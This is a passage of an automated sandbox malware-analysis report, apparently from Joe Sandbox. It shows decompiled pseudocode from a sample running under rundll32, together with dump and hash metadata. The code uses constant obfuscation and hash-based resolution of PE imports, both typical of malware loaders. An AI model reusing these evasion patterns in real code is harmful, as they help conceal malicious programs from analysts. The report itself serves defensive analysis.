                                                                                                                                    				_v48 = 0x9a7516;
                                                                                                                                    				_v48 = _v48 + 0xffff4702;
                                                                                                                                    				_v48 = _v48 * 0x45;
                                                                                                                                    				_v48 = _v48 + 0xffff2ff5;
                                                                                                                                    				_t146 = 0x4903f33;
                                                                                                                                    				_v48 = _v48 ^ 0x296ff1ed;
                                                                                                                                    				_v16 = 0xfa3b71;
                                                                                                                                    				_v16 = _v16 << 9;
                                                                                                                                    				_v16 = _v16 ^ 0xf47f6bba;
                                                                                                                                    				_v20 = 0xc0b9b;
                                                                                                                                    				_t133 = 0x7b;
                                                                                                                                    				_v20 = _v20 * 0x52;
                                                                                                                                    				_v20 = _v20 ^ 0x03d2ca7d;
                                                                                                                                    				_v36 = 0x400b3e;
                                                                                                                                    				_v36 = _v36 ^ 0xba288636;
                                                                                                                                    				_v36 = _v36 ^ 0xc4c376ba;
                                                                                                                                    				_v36 = _v36 ^ 0x7eaacb92;
                                                                                                                                    				_v52 = 0x3419b2;
                                                                                                                                    				_v52 = _v52 / _t133;
                                                                                                                                    				_v52 = _v52 >> 0xc;
                                                                                                                                    				_v52 = _v52 | 0xcef26f8a;
                                                                                                                                    				_v52 = _v52 ^ 0xcef1d6cf;
                                                                                                                                    				_v4 = 0xb26f64;
                                                                                                                                    				_t134 = 3;
                                                                                                                                    				_v4 = _v4 / _t134;
                                                                                                                                    				_v4 = _v4 ^ 0x003ff5cc;
                                                                                                                                    				_v40 = 0x34a33d;
                                                                                                                                    				_v40 = _v40 >> 4;
                                                                                                                                    				_v40 = _v40 ^ 0xd21b54bd;
                                                                                                                                    				_v40 = _v40 ^ 0x33ae4ce0;
                                                                                                                                    				_v40 = _v40 ^ 0xe1b00bb7;
                                                                                                                                    				_v8 = 0x4c76b4;
                                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                                    				_v8 = _v8 ^ 0x013e4034;
                                                                                                                                    				_v24 = 0x1c9e42;
                                                                                                                                    				_v24 = _v24 ^ 0x4f10b4b5;
                                                                                                                                    				_v24 = _v24 << 4;
                                                                                                                                    				_v24 = _v24 ^ 0xf0cd9088;
                                                                                                                                    				_v44 = 0xfe69b1;
                                                                                                                                    				_v44 = _v44 >> 0xd;
                                                                                                                                    				_v44 = _v44 * 0x49;
                                                                                                                                    				_v44 = _v44 * 0x7d;
                                                                                                                                    				_v44 = _v44 ^ 0x011db47c;
                                                                                                                                    				_v28 = 0x46ec28;
                                                                                                                                    				_v28 = _v28 << 9;
                                                                                                                                    				_v28 = _v28 * 0x58;
                                                                                                                                    				_v28 = _v28 ^ 0xc2551a85;
                                                                                                                                    				_t135 =  *0x2e3e0c; // 0x0
                                                                                                                                    				do {
                                                                                                                                    					while(_t146 != 0x4903f33) {
                                                                                                                                    						if(_t146 == 0x6f617aa) {
                                                                                                                                    							_t128 = E002C46BE(_t135, _v4, _t135, _v40, _t135, _v8, _v24, _v44, _t135, 0, E002C81B7, _v28);
                                                                                                                                    							_t135 =  *0x2e3e0c; // 0x0
                                                                                                                                    							 *((intOrPtr*)(_t135 + 0x10)) = _t128;
                                                                                                                                    						} else {
                                                                                                                                    							if(_t146 != 0xc69f0b3) {
                                                                                                                                    								goto L6;
                                                                                                                                    							} else {
                                                                                                                                    								_t131 = E002C7AF6(_v16, _t135, _v20, _t135, _v36, _t135, _v52);
                                                                                                                                    								_t135 =  *0x2e3e0c; // 0x0
                                                                                                                                    								_t148 =  &(_t148[6]);
                                                                                                                                    								_t146 = 0x6f617aa;
                                                                                                                                    								 *((intOrPtr*)(_t135 + 8)) = _t131;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						L9:
                                                                                                                                    						return 0 | _t135 != 0x00000000;
                                                                                                                                    					}
                                                                                                                                    					_push(_t135);
                                                                                                                                    					_push(_t135);
                                                                                                                                    					_t143 = 0x24;
                                                                                                                                    					_t135 = E002C7FF2(_t143);
                                                                                                                                    					_t146 = 0xc69f0b3;
                                                                                                                                    					 *0x2e3e0c = _t135;
                                                                                                                                    					L6:
                                                                                                                                    				} while (_t146 != 0xab42793);
                                                                                                                                    				goto L9;
                                                                                                                                    			}
























                                                                                                                                    0x002ce1f7
                                                                                                                                    0x002ce1fd
                                                                                                                                    0x002ce1fd
                                                                                                                                    0x00000000

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (F$"
                                                                                                                                    • API String ID: 0-1034852068
                                                                                                                                    • Opcode ID: 649c8d2b9135fe45b1aba88badc9279e6e23b8f4d5228251c541b79d12d8f20c
                                                                                                                                    • Instruction ID: 76b526ec1360ce41e9e264649e876e7f58e6bdf987eb0bd194010b31e63e9d06
                                                                                                                                    • Opcode Fuzzy Hash: 649c8d2b9135fe45b1aba88badc9279e6e23b8f4d5228251c541b79d12d8f20c
                                                                                                                                    • Instruction Fuzzy Hash: 045154714093019FC348CF25D98A90FBBE1EBC4758F148A1DF599AA260D3B1DA19CF87
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 92%
                                                                                                                                    			E002C7C37(void* __ecx, void* __edx) {
                                                                                                                                    				void* _t91;
                                                                                                                                    				void* _t102;
                                                                                                                                    				signed short _t108;
                                                                                                                                    				signed short _t111;
                                                                                                                                    				signed short _t113;
                                                                                                                                    				signed int _t115;
                                                                                                                                    				signed int _t116;
                                                                                                                                    				signed int _t117;
                                                                                                                                    				signed short _t121;
                                                                                                                                    				intOrPtr _t128;
                                                                                                                                    				signed short* _t132;
                                                                                                                                    				signed short _t133;
                                                                                                                                    				intOrPtr _t134;
                                                                                                                                    				void* _t135;
                                                                                                                                    				void* _t136;
                                                                                                                                    
                                                                                                                                    				_t134 =  *((intOrPtr*)(_t135 + 0x30));
                                                                                                                                    				_push(_t134);
                                                                                                                                    				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                                    				_push( *((intOrPtr*)(_t135 + 0x38)));
                                                                                                                                    				_push(__edx);
                                                                                                                                    				_push(__ecx);
                                                                                                                                    				E002D20B9(_t91);
                                                                                                                                    				 *((intOrPtr*)(_t135 + 0x2c)) = 0x3628ac;
                                                                                                                                    				_t136 = _t135 + 0x14;
                                                                                                                                    				 *(_t136 + 0x18) =  *(_t136 + 0x18) + 0xfffff240;
                                                                                                                                    				_t115 = 0x47;
                                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x18) * 0x5d;
                                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x13a7c7bd;
                                                                                                                                    				 *(_t136 + 0x28) = 0x411077;
                                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) / _t115;
                                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x0001576b;
                                                                                                                                    				 *(_t136 + 0x14) = 0x6ab109;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4522ba60;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) + 0x6e2e;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x405c50e2;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0x45775e58;
                                                                                                                                    				 *(_t136 + 0x3c) = 0x583f0;
                                                                                                                                    				_t116 = 0x13;
                                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x3c) / _t116;
                                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0xb139aa03;
                                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x38) * 0x57;
                                                                                                                                    				 *(_t136 + 0x38) =  *(_t136 + 0x38) ^ 0x3aa1b70d;
                                                                                                                                    				 *(_t136 + 0x28) = 0xeb6063;
                                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) >> 9;
                                                                                                                                    				 *(_t136 + 0x28) =  *(_t136 + 0x28) ^ 0x000c5736;
                                                                                                                                    				 *(_t136 + 0x20) = 0x8f08a1;
                                                                                                                                    				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x1f969638;
                                                                                                                                    				 *(_t136 + 0x20) =  *(_t136 + 0x20) >> 2;
                                                                                                                                    				 *(_t136 + 0x20) =  *(_t136 + 0x20) ^ 0x07c9f7a9;
                                                                                                                                    				 *(_t136 + 0x1c) = 0x46d0e7;
                                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) >> 6;
                                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) * 0x16;
                                                                                                                                    				 *(_t136 + 0x1c) =  *(_t136 + 0x1c) ^ 0x00141072;
                                                                                                                                    				 *(_t136 + 0x14) = 0x9e0f5b;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) * 0x61;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) | 0x4163d75f;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) << 6;
                                                                                                                                    				 *(_t136 + 0x14) =  *(_t136 + 0x14) ^ 0xf8f2ab9c;
                                                                                                                                    				_t117 =  *(_t136 + 0x18);
                                                                                                                                    				_t102 =  *((intOrPtr*)(_t134 + 0x3c)) + _t134;
                                                                                                                                    				_t128 =  *((intOrPtr*)(_t102 + 0x78 + _t117 * 8));
                                                                                                                                    				if(_t128 == 0 ||  *((intOrPtr*)(_t102 + 0x7c + _t117 * 8)) == 0) {
                                                                                                                                    					L13:
                                                                                                                                    					return 1;
                                                                                                                                    				} else {
                                                                                                                                    					_t133 = _t128 + _t134;
                                                                                                                                    					while(1) {
                                                                                                                                    						_t105 =  *((intOrPtr*)(_t133 + 0xc));
                                                                                                                                    						if( *((intOrPtr*)(_t133 + 0xc)) == 0) {
                                                                                                                                    							goto L13;
                                                                                                                                    						}
                                                                                                                                    						_t121 = E002DCADF( *((intOrPtr*)(_t136 + 0x2c)), _t105 + _t134,  *(_t136 + 0x14),  *(_t136 + 0x38));
                                                                                                                                    						 *(_t136 + 0x18) = _t121;
                                                                                                                                    						__eflags = _t121;
                                                                                                                                    						if(_t121 == 0) {
                                                                                                                                    							L15:
                                                                                                                                    							return 0;
                                                                                                                                    						}
                                                                                                                                    						_t132 =  *_t133 + _t134;
                                                                                                                                    						_t113 =  *((intOrPtr*)(_t133 + 0x10)) + _t134;
                                                                                                                                    						while(1) {
                                                                                                                                    							_t108 =  *_t132;
                                                                                                                                    							__eflags = _t108;
                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                    								break;
                                                                                                                                    							}
                                                                                                                                    							if(__eflags >= 0) {
                                                                                                                                    								_t110 = _t108 + 2 + _t134;
                                                                                                                                    								__eflags = _t108 + 2 + _t134;
                                                                                                                                    							} else {
                                                                                                                                    								_t110 = _t108 & 0x0000ffff;
                                                                                                                                    							}
                                                                                                                                    							_t111 = E002C6CA0( *((intOrPtr*)(_t136 + 0x34)),  *((intOrPtr*)(_t136 + 0x2c)), _t110,  *((intOrPtr*)(_t136 + 0x24)),  *(_t136 + 0x18), _t121);
                                                                                                                                    							_t136 = _t136 + 0x10;
                                                                                                                                    							__eflags = _t111;
                                                                                                                                    							if(_t111 == 0) {
                                                                                                                                    								goto L15;
                                                                                                                                    							} else {
                                                                                                                                    								_t121 =  *(_t136 + 0x18);
                                                                                                                                    								_t132 =  &(_t132[2]);
                                                                                                                                    								 *_t113 = _t111;
                                                                                                                                    								_t113 = _t113 + 4;
                                                                                                                                    								__eflags = _t113;
                                                                                                                                    								continue;
                                                                                                                                    							}
                                                                                                                                    						}
                                                                                                                                    						_t133 = _t133 + 0x14;
                                                                                                                                    						__eflags = _t133;
                                                                                                                                    					}
                                                                                                                                    					goto L13;
                                                                                                                                    				}
                                                                                                                                    			}


















                                                                                                                                    0x002c7de1
                                                                                                                                    0x002c7de1
                                                                                                                                    0x002c7de3
                                                                                                                                    0x002c7de5
                                                                                                                                    0x00000000
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dab
                                                                                                                                    0x002c7db5
                                                                                                                                    0x002c7db5
                                                                                                                                    0x002c7dad
                                                                                                                                    0x002c7dad
                                                                                                                                    0x002c7dad
                                                                                                                                    0x002c7dc9
                                                                                                                                    0x002c7dce
                                                                                                                                    0x002c7dd1
                                                                                                                                    0x002c7dd3
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dd5
                                                                                                                                    0x002c7dd5
                                                                                                                                    0x002c7dd9
                                                                                                                                    0x002c7ddc
                                                                                                                                    0x002c7dde
                                                                                                                                    0x002c7dde
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dde
                                                                                                                                    0x002c7dd3
                                                                                                                                    0x002c7de7
                                                                                                                                    0x002c7de7
                                                                                                                                    0x002c7de7
                                                                                                                                    0x00000000
                                                                                                                                    0x002c7dea

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: X^wE$c`
                                                                                                                                    • API String ID: 0-1321574684
                                                                                                                                    • Opcode ID: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                    • Instruction ID: a48b16e5880782392270548733fc9990385cba582d6fac447b63a22f7d923f48
                                                                                                                                    • Opcode Fuzzy Hash: 7e68209abe564a2167ede9e324bbe1b43f6973aa39a1b0bb2789b6df6e85ae44
                                                                                                                                    • Instruction Fuzzy Hash: 9E5184715083429FC718DF24D886A2BBBE1FFC4398F10891DF48696221E3B1DA58CF96
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 62%
                                                                                                                                    			E002C4C5D(intOrPtr _a4) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				signed int _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				void* _t106;
                                                                                                                                    				void* _t108;
                                                                                                                                    				intOrPtr* _t109;
                                                                                                                                    				signed int _t112;
                                                                                                                                    				signed int _t113;
                                                                                                                                    				signed int _t114;
                                                                                                                                    				intOrPtr _t128;
                                                                                                                                    
                                                                                                                                    				_v44 = _v44 & 0x00000000;
                                                                                                                                    				_v48 = 0xad4f7a;
                                                                                                                                    				_v16 = 0xf18dbd;
                                                                                                                                    				_v16 = _v16 + 0xffff4795;
                                                                                                                                    				_v16 = _v16 << 0xe;
                                                                                                                                    				_v16 = _v16 >> 6;
                                                                                                                                    				_v16 = _v16 ^ 0x00dff17e;
                                                                                                                                    				_v12 = 0xaf5949;
                                                                                                                                    				_v12 = _v12 | 0xe2d389df;
                                                                                                                                    				_v12 = _v12 + 0x286;
                                                                                                                                    				_t112 = 3;
                                                                                                                                    				_v12 = _v12 / _t112;
                                                                                                                                    				_v12 = _v12 ^ 0x4ba32b72;
                                                                                                                                    				_v24 = 0x2aefd1;
                                                                                                                                    				_t113 = 0x7d;
                                                                                                                                    				_t128 = _a4;
                                                                                                                                    				_v24 = _v24 * 0x59;
                                                                                                                                    				_v24 = _v24 << 2;
                                                                                                                                    				_v24 = _v24 ^ 0x3bb9ca43;
                                                                                                                                    				_v8 = 0x985427;
                                                                                                                                    				_v8 = _v8 << 2;
                                                                                                                                    				_v8 = _v8 ^ 0x713a2c3c;
                                                                                                                                    				_v8 = _v8 | 0x45eb1ca3;
                                                                                                                                    				_v8 = _v8 ^ 0x77f5f6d4;
                                                                                                                                    				_v28 = 0xa7f2b4;
                                                                                                                                    				_v28 = _v28 >> 0xc;
                                                                                                                                    				_v28 = _v28 + 0x7e4a;
                                                                                                                                    				_v28 = _v28 ^ 0x000cc7a8;
                                                                                                                                    				_v40 = 0x7087c6;
                                                                                                                                    				_t114 = 0x69;
                                                                                                                                    				_v40 = _v40 / _t113;
                                                                                                                                    				_v40 = _v40 ^ 0x00014835;
                                                                                                                                    				_v20 = 0xcde00b;
                                                                                                                                    				_v20 = _v20 + 0xffffcf30;
                                                                                                                                    				_v20 = _v20 | 0xcdf6f1c4;
                                                                                                                                    				_v20 = _v20 + 0xfc2b;
                                                                                                                                    				_v20 = _v20 ^ 0xce0272c5;
                                                                                                                                    				_v36 = 0x30875a;
                                                                                                                                    				_v36 = _v36 * 0x47;
                                                                                                                                    				_v36 = _v36 / _t114;
                                                                                                                                    				_v36 = _v36 ^ 0x0028facf;
                                                                                                                                    				_v32 = 0x6c449b;
                                                                                                                                    				_v32 = _v32 >> 0xf;
                                                                                                                                    				_v32 = _v32 + 0xffff12fc;
                                                                                                                                    				_v32 = _v32 ^ 0xfff19483;
                                                                                                                                    				_t106 =  *((intOrPtr*)(_t128 + 0x1c))( *((intOrPtr*)(_t128 + 0x38)), 1, 0);
                                                                                                                                    				_t134 = _t106;
                                                                                                                                    				if(_t106 != 0) {
                                                                                                                                    					_push(_v8);
                                                                                                                                    					_push(_v24);
                                                                                                                                    					_push(_v12);
                                                                                                                                    					_t108 = E002D8606(_v16, 0x2c1378, _t134);
                                                                                                                                    					_push(_v20);
                                                                                                                                    					_t130 = _t108;
                                                                                                                                    					_push(_t108);
                                                                                                                                    					_push(_v40);
                                                                                                                                    					_t109 = E002CCBDF(_v28,  *((intOrPtr*)(_t128 + 0x38)));
                                                                                                                                    					if(_t109 != 0) {
                                                                                                                                    						 *_t109();
                                                                                                                                    					}
                                                                                                                                    					E002CA8B0(_v36, _t130, _v32);
                                                                                                                                    				}
                                                                                                                                    				return 0;
                                                                                                                                    			}

                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: <,:q$J~
                                                                                                                                    • API String ID: 0-951887683
                                                                                                                                    • Opcode ID: 1973269059d88faa7896798448e54df35c01b6966fc70b95225b41a448ebad0b
                                                                                                                                    • Instruction ID: 103f618c63bf3b5bc8cb380b972ce6e03fda4297cbe3efd7b7d0c468ba4807f1
                                                                                                                                    • Opcode Fuzzy Hash: 1973269059d88faa7896798448e54df35c01b6966fc70b95225b41a448ebad0b
                                                                                                                                    • Instruction Fuzzy Hash: 66411E71D0130EABDF08DFA1C94AAEEBBB1FB54314F208199D401BA2A0D7B50B55CFA4
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                    			E002CEE81(void* __eflags) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				signed int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				char _v44;
                                                                                                                                    				short _v48;
                                                                                                                                    				short _v52;
                                                                                                                                    				intOrPtr _v56;
                                                                                                                                    				char _v576;
                                                                                                                                    				intOrPtr* _t95;
                                                                                                                                    				signed int _t99;
                                                                                                                                    				signed int _t100;
                                                                                                                                    
                                                                                                                                    				_v56 = 0x3b8b1c;
                                                                                                                                    				_v44 = 0;
                                                                                                                                    				_v52 = 0;
                                                                                                                                    				_v48 = 0;
                                                                                                                                    				_v8 = 0xf9e323;
                                                                                                                                    				_v8 = _v8 ^ 0x73816ffa;
                                                                                                                                    				_v8 = _v8 + 0x5b26;
                                                                                                                                    				_v8 = _v8 ^ 0x387262e7;
                                                                                                                                    				_v8 = _v8 ^ 0x4b076809;
                                                                                                                                    				_v20 = 0x75aab0;
                                                                                                                                    				_v20 = _v20 ^ 0xc40c30fa;
                                                                                                                                    				_v20 = _v20 + 0x78e9;
                                                                                                                                    				_v20 = _v20 ^ 0xc4737271;
                                                                                                                                    				_v16 = 0xa8e87a;
                                                                                                                                    				_v16 = _v16 + 0xffff799a;
                                                                                                                                    				_t99 = 0x33;
                                                                                                                                    				_v16 = _v16 / _t99;
                                                                                                                                    				_v16 = _v16 ^ 0x000fed3f;
                                                                                                                                    				_v28 = 0x7feeb5;
                                                                                                                                    				_v28 = _v28 + 0xffffe4f6;
                                                                                                                                    				_v28 = _v28 ^ 0x007d0c9c;
                                                                                                                                    				_v32 = 0x59c916;
                                                                                                                                    				_t100 = 0x5d;
                                                                                                                                    				_v32 = _v32 / _t100;
                                                                                                                                    				_v32 = _v32 ^ 0x000d1fec;
                                                                                                                                    				_v12 = 0x866588;
                                                                                                                                    				_v12 = _v12 ^ 0x68ade4cb;
                                                                                                                                    				_v12 = _v12 + 0xffffbaa5;
                                                                                                                                    				_v12 = _v12 ^ 0x68223e43;
                                                                                                                                    				_v36 = 0xbafac2;
                                                                                                                                    				_v36 = _v36 ^ 0x5e34b155;
                                                                                                                                    				_v36 = _v36 ^ 0x5e8c811c;
                                                                                                                                    				_v24 = 0xc770cb;
                                                                                                                                    				_v24 = _v24 >> 0xf;
                                                                                                                                    				_v24 = _v24 ^ 0x95635bf4;
                                                                                                                                    				_v24 = _v24 ^ 0x956359d7;
                                                                                                                                    				_v40 = 0xbd0b83;
                                                                                                                                    				_v40 = _v40 >> 3;
                                                                                                                                    				_v40 = _v40 ^ 0x001e2563;
                                                                                                                                    				_t101 = _v8;
                                                                                                                                    				if(E002D8F15(_v8,  &_v576, _t100, _v20, _v16, _v28) != 0) {
                                                                                                                                    					_t95 =  &_v576;
                                                                                                                                    					if(_v576 != 0) {
                                                                                                                                    						while( *_t95 != 0x5c) {
                                                                                                                                    							_t95 = _t95 + 2;
                                                                                                                                    							if( *_t95 != 0) {
                                                                                                                                    								continue;
                                                                                                                                    							} else {
                                                                                                                                    							}
                                                                                                                                    							goto L6;
                                                                                                                                    						}
                                                                                                                                    						_t101 = 0;
                                                                                                                                    						 *((short*)(_t95 + 2)) = 0;
                                                                                                                                    					}
                                                                                                                                    					L6:
                                                                                                                                    					E002DDB43(_t101,  &_v44, _t101, _v32, _t101,  &_v576, _t101, _v12, _t101, _v36, _v24, _v40);
                                                                                                                                    				}
                                                                                                                                    				return _v44;
                                                                                                                                    			}





















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: C>"h$br8
                                                                                                                                    • API String ID: 0-573140060
                                                                                                                                    • Opcode ID: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                    • Instruction ID: 7e5a9ae09fb1965142be88d85156b0df4a0e951430ea2e7d80fd1fcdf2484d12
                                                                                                                                    • Opcode Fuzzy Hash: 7ac889efe45ecef08edc0b333689601836d50e629c71184f631a065bc1168af8
                                                                                                                                    • Instruction Fuzzy Hash: 9341E071C0121AEBCF18CFE4C94A9EEBBB5FB04304F20819AE515B6260E3B45A55CF90
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 88%
                                                                                                                                    			E002DAA30(signed int __edx, intOrPtr _a4, intOrPtr _a12) {
                                                                                                                                    				signed int _v8;
                                                                                                                                    				signed int _v12;
                                                                                                                                    				signed int _v16;
                                                                                                                                    				unsigned int _v20;
                                                                                                                                    				signed int _v24;
                                                                                                                                    				signed int _v28;
                                                                                                                                    				signed int _v32;
                                                                                                                                    				signed int _v36;
                                                                                                                                    				signed int _v40;
                                                                                                                                    				intOrPtr _v44;
                                                                                                                                    				intOrPtr _v48;
                                                                                                                                    				void* _t83;
                                                                                                                                    				signed int _t85;
                                                                                                                                    				signed int _t91;
                                                                                                                                    
                                                                                                                                    				_v40 = _v40 & 0x00000000;
                                                                                                                                    				_v48 = 0xea50c7;
                                                                                                                                    				_v44 = 0x183406;
                                                                                                                                    				_v8 = 0x4cb37c;
                                                                                                                                    				_v8 = _v8 + 0xc736;
                                                                                                                                    				_v8 = _v8 + 0xd4a7;
                                                                                                                                    				_t91 = __edx;
                                                                                                                                    				_t85 = 0x64;
                                                                                                                                    				_v8 = _v8 * 0x2d;
                                                                                                                                    				_v8 = _v8 ^ 0x0dcd94f9;
                                                                                                                                    				_v24 = 0x238f3e;
                                                                                                                                    				_v24 = _v24 << 3;
                                                                                                                                    				_v24 = _v24 ^ 0x011b8be3;
                                                                                                                                    				_v20 = 0x73abc8;
                                                                                                                                    				_v20 = _v20 >> 3;
                                                                                                                                    				_v20 = _v20 ^ 0x00035013;
                                                                                                                                    				_v16 = 0x5012b6;
                                                                                                                                    				_v16 = _v16 >> 0x10;
                                                                                                                                    				_v16 = _v16 / _t85;
                                                                                                                                    				_v16 = _v16 ^ 0x000aff4c;
                                                                                                                                    				_v12 = 0x8c34bb;
                                                                                                                                    				_v12 = _v12 | 0x8c5a3f77;
                                                                                                                                    				_v12 = _v12 + 0xffff11fb;
                                                                                                                                    				_v12 = _v12 ^ 0x2d4fbea1;
                                                                                                                                    				_v12 = _v12 ^ 0xa19c1e56;
                                                                                                                                    				_v36 = 0xff820a;
                                                                                                                                    				_v36 = _v36 | 0x4fe4a4bc;
                                                                                                                                    				_v36 = _v36 ^ 0x4ffdd4f4;
                                                                                                                                    				_v32 = 0x36506a;
                                                                                                                                    				_v32 = _v32 + 0x4de;
                                                                                                                                    				_v32 = _v32 ^ 0x003709b9;
                                                                                                                                    				_v28 = 0x64fd3b;
                                                                                                                                    				_v28 = _v28 + 0xffff3e7a;
                                                                                                                                    				_v28 = _v28 ^ 0x00656766;
                                                                                                                                    				if( *((intOrPtr*)(0x2e3210 + __edx * 4)) == 0) {
                                                                                                                                    					_t83 = E002D0A0E(_t85, _t85, _a4);
                                                                                                                                    					_push(_v28);
                                                                                                                                    					_push(_a12);
                                                                                                                                    					_push(_v32);
                                                                                                                                    					_push(_t83);
                                                                                                                                    					 *((intOrPtr*)(0x2e3210 + _t91 * 4)) = E002CCDCD(_v12, _v36);
                                                                                                                                    				}
                                                                                                                                    				return  *((intOrPtr*)(0x2e3210 + _t91 * 4));
                                                                                                                                    			}


















                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000009.00000002.464808022.00000000002C1000.00000020.00000800.00020000.00000000.sdmp, Offset: 002C0000, based on PE: true
                                                                                                                                    • Associated: 00000009.00000002.464801297.00000000002C0000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    • Associated: 00000009.00000002.464824952.00000000002E3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_9_2_2c0000_rundll32.jbxd
                                                                                                                                    Yara matches
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: fge$jP6
                                                                                                                                    • API String ID: 0-775479084
                                                                                                                                    • Opcode ID: 3012190e4f00433294273ce5f3a6bdcb3f38276572ac6e89953ebcd59660128e
                                                                                                                                    • Instruction ID: 597911b4bdd8ad9b363649ae8f04826339dd081826476b0eb471d96e5840cab6
                                                                                                                                    • Opcode Fuzzy Hash: 3012190e4f00433294273ce5f3a6bdcb3f38276572ac6e89953ebcd59660128e
                                                                                                                                    • Instruction Fuzzy Hash: 0031C1B5C1020DEBCF48CFA5CA8A9DEBBB5FB09318F108199D551B6220C3B95B49CF95
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    C-Code - Quality: 83%
